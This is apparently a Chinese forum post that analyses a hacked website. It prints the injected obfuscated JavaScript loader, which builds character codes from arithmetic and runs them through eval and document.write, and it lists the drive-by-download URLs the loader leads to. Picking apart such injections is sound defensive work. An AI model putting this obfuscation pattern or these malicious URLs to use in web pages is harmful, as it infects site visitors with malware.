这个解密有要有点耐心,并不是难,而是要计算
下面我看到的代码
Log is generated by FreShow.
[wide]http://ep.cbifamily.com/2008/13/34/78026.html
[script]http://www.cbifamily.com/publish/countep.php?Id=78026&id2=76758
[script]http://www.cbifamily.com/publish/counter.php?o=display&type=total&IndexID=78026
[script]http://www.cbifamily.com/global/footer.js
[frame]http://www.cbifamily.com/global/h002/ad.jpg(恶意代码在这儿)
t="50 + 30 ,1944 / 27 ,312 / 4 ,212 / 2 ,136 - 37 ,24 + 85 ,1 + 107 ,158 - 39 ,1200 / 12 ,103 - 36 ,105 - 39 ,146 - 31 ,130 - 41 ,70 + 17 ,39 + 14 ,11440 / 104 ,5 + 95 ,135 - 48 ,1540 / 22 ,86 + 24 ,7740 / 86 ,1428 / 17 ,784 / 16 ,13 + 100 ,31 + 58 ,36 + 52 ,131 - 41 ,3536 / 34 ,3267 / 33 ,36 + 14 ,38 + 40 ,146 - 25 ,46 + 51 ,3520 / 40 ,1320 / 20 ,24 + 24 ,121 - 48 ,1008 / 14 ,1326 / 17 ,170 - 49 ,3827 / 43 ,1464 / 12 ,1920 / 40 ,18 + 99 ,147 - 71 ,183 - 78 ,39 + 18 ,10379 / 97 ,5580 / 62 ,30 + 57 ,90 / 1 ,129 - 25 ,15 + 85 ,33 + 54 ,180 - 60 ,92 - 44 ,5776 / 76 ,208 - 99 ,5376 / 48 ,14762 / 121 ,11 + 69 ,9010 / 85 ,199 - 80 ,13924 / 118 ,94 + 5 ,33 + 17 ,141 - 63 ,36 + 85 ,0 + 97 ,150 - 62 ,44 + 22 ,25 + 23 ,129 - 49 ,87 + 16 ,69 - 8 ,85 - 24 ";
t=eval("mydata(String.fromCharCode("+t+"))");
document.write(t);
</script>
其实就是上面这儿需要计算
转化后得到代码src=../default.js
因此需要进入default.js然后esc
可以得到下面挂马网址
Log is generated by FreShow.
[unknown]
[frame]http://u.fse7.cn/d5/x4/index.htm?03
[frame]http://u.fse7.cn/d5/x4/index2.htm
[frame]http://u.fse7.cn/d5/x4/ccqm.htm
[script]http://u.fse7.cn/d5/x4/js.css
[frame]http://u.fse7.cn/d5/x4/cc14.htm
[frame]http://u.fse7.cn/d5/x4/ccfl.htm
[frame]http://u.fse7.cn/d5/x4/ccvod.htm
[frame]http://u.fse7.cn/d5/x4/ccxxz.htm
[frame]http://u.fse7.cn/d5/x4/ccgg.htm
[frame]http://u.fse7.cn/d5/x4/ccff.htm
[frame]http://u.fse7.cn/d5/x4/ccbf.htm
[frame]http://u.fse7.cn/d5/x4/cc122121.htm
[script]http://js.tongji.cn.yahoo.com/1051064/ystat.js
[script]http://count7.51much.com/cnt.php?uid=UA-1-12963&style=text&text=网站统计 |